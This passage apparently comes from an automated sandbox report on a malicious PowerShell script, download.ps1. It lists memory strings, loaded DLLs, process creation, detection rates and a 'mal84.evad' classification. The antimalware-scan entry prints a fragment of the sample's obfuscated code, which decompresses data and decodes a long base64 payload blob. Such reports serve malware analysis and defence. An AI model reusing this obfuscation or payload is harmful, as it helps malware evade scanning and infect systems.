Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E3FE7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.2217128894.00000111E388F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2256586697.00000111F2269000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2048000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E390A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F201C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F21C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2256586697.00000111F2381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2217128894.00000111E38AB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ20pmmnlffYb1xXpsADo1rFclZRRAGc7" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oG2YgZBBwq8tE9dYnVc4XZLiXbO4w',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQ/rs\x3dACT90oE4VDuypTCPH8jtHQgPMB8KgoFScQ',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="7w6CO02cEtStPa5V75PqCQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: classification engineClassification label: mal84.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6636:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbqcurvk.5pm.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $nrgjt5lz4yhicsu.(([char[]]@((8949-(23768232/(10160-7484))),(-1767+1878),(295792/2641),(-366+487),(298-(1734-1520)),(106116/956)) -join ''))( $8rp61yw5vju9sxg ) $nrgjt5lz4yhicsu.(([char[]]@((2213-2146),(177120/1640),(840714/7574),(867905/7547),(980003/9703)) -join ''))()$mpcn9vr7q8td12h.((-join (@((8237-8170),(-1034+(2397-(-1404+(10043043/(-110+3887))))),(-3145+3256),(-178+293),(535401/(37038087/6987)))| ForEach-Object { [char]$_ })))()[byte[]] $ia65phg4rfbu2qz = $8rp61yw5vju9sxg.(([system.String]::new(@((-1816+1900),(-10010+10121),(542100/8340),(953040/8360),(-4493+4607),(-9116+9213),(20691/171)))))() $l452znyjpth30ve=$ia65phg4rfbu2qz return $l452znyjpth30ve}[System.Text.Encoding]::ascii.(([char[]]@((6103-(2087072/(1393342/4027))),(-4408+4509),(5001-(36427445/7457)),(-6108+6191),(1026136/(15441-6595)),(812478/(41913887/5881)),(187530/(5672-(11890-8004))),(3163-(460+2593)),(5522-(15969793/2947))) -join ''))((5dmopfzenxq8c3istrw67al9vku "KP99ZzFrOWYyaantbBtosESspk32ttWxZ+e2KXfY1nEtKz/VeuvvZ/woJmqVyVy7lVrhJaD9Lb3p1IuO7Y/l8yUxa4X2exsWUburDMxEUsvHPsPPhQubmMmX3MXVjuvtiY+cisi0lvjImcSP3q+m9JqgivHRThu+GDuqOU8QxomhBkrLT4qB4MKs1igoVOiO0J2QnW7Ex57ErJ/a/Kf+2G91ZjiLV07ByJwnaMe0hBjBk8aF8vfKOW/3pJnOlAOuq+vLvs6wR7lkofUczOYoEJTelB8p57qP90MHFmqFvNlNtkiDUq+O82szzlhy/sA2f13S18g327enV+GJz67fFIspsdezRIPRXFBirCsQ9dxooBWL+uOnnhtT1mRpmGUslsOhjYckh7EuGu0pr1kd6k3WfXCaRkaYWa3ytcx5JO3ini6mbC7Y3VmOT+jRm5UEgAaCe1sLkJ0msoaGCygpkAia/c+PxMyTuXqKHIE0ptgKUusYTCailPc5ZatqBBlc35dQUw+1U68K+e/NRAEJ+WR/JpItoIcoLE8R7P6X2/xluif3qyj/PBk1MgMRs44udD8Avp7Vr9DC89ap+urXeZOc+xCZTN3oijr5QJtWFJ3eM9VRa9ncQEq3Y99qQeXGb78jHD28NqCn2WTsHb/HajpVFEtw9KL+ngf6i+2JEsFS5ma6ZRm44vbEZTnR9n4bjSd5i3C5pxUTtmzPONjhgsm/QkuowT7ERBq7uh1KfHnCymQqXtEHRaRTY9+4F8q62TtaSM+IwYL/k6M2eDs6SUZU1tgNEEYNxomImOyWQxJCGgbKCoW0NYc7pGOypgh6MBfyeLjeI9SF7kC/XBMM55R8JtO+oaudpftAoP8JU2lY3DSleB/HKhQN8zxuzYqmvrMn0NfZj8VE3KLHLd+oXFTUSaTMAkT81DtLA/NADSnGmdvnQvgg/HnHVdOHpS1fhsHNi0qeTKtqpormvV8+zX/SixAAE91Npgm0QKa1WtSx4W3gJDcoFfpIUnW3MHzKeBqQtmacZ9kP0ggIhcsKHkAeQ5LFPsOP3pOCllTcp5hbHsuAxoeiwI6FR9jJgf3qYJP6uB9kTp0LUmtjvr9X0pcXjYqDCL0lVIHs9xHdLbbvgjtjC2Z9yionJcvKG1nfmH6vlmRC5yNkOK+i7WXccY0wS5LA6FsGuFo76K4Wgp3Dx2GbLkopQ1h6c6zyQM/Vu1j0RL3VQ0t38vicfRqbVF/bHuS02wS0YTyyo0DRq64F+/hancBwx2JtfI2MjrzrVfx5PGrEpU35jTXPg1Jl7h5U4zQIu32Grw8/baa+gtLyx/CRfXmpzYiuzrH8ltvOD0oOlOLYqtE5nvJ2yIeXCy+T13nGqTnFmqUQRnkH9yFX8RQ9FrLk9hmqIg7RK6g2Ka61enWE4lhMKZtw+rYRRaQvG3Dqf+41riysTxFZwoi243LLm5D6+DHyEn6MvzDJtxGD2q1AUDVMh1hC0Ev184WJ8UrzQ78ts2D3q6mhMwhgoqHlfxuqXLE048DVuJNyLh79ahH5ZnY/COx4bITVgng9kIAj8fjue2KNNG4WzpvBswx/CluOi/gH5EfhN7kjtUzEUL/0QSnh7dQq/j50H0cGQCYdeSunaXKHUXBy4WzXx7WMAfA/4ZWy+NKvCX/t9lbrdMuDf8qXxxW2DwJJE9ART6/ec3zxOrQVJKG34aGobghoSHG9wXwLKkkl0RWZVK9LEH55iqM1SSna1LZgo6jw//N0sG5jhpkzX8yVziGBX1x204XdPTcL7WL1b61cLidM2Pd5NctUZjSeIYf1tjFIFcctRJpTzD7NbL/28kqa+SPsOnuRChDssVHpBHntieRl/9xglbGwFzUNfN5z/Bx+ekfk+jMkFcJ9AAs2DIPTqWStfKC/oNEbG124scAHif2WOYpgGi12x4YVtSYu738KqjzEpyrl6Jdc8gDivkd5O3yvH6JiidhiLO09fqIR
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: download.ps1Virustotal: Detection: 11%
Source: download.ps1ReversingLabs: Detection: 15%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: mscorlib.pdba source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: softy.pdbdll source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbj source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.2267521502.00000111FA369000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdbw7Z source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2216453453.00000111DFFF2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdbll source: powershell.exe, 00000000.00000002.2267521502.00000111FA313000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbf source: powershell.exe, 00000000.00000002.2264659089.00000111FA213000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3479D2A5 pushad ; iretd 0_2_00007FFD3479D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B751D push ebx; iretd 0_2_00007FFD348B756A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B0953 push E95AB8D0h; ret 0_2_00007FFD348B09C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD348B00BD pushad ; iretd 0_2_00007FFD348B00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3498A938 push eax; retf 0_2_00007FFD3498A939
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD3498BCB8 push edx; iretd 0_2_00007FFD3498BCBB

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
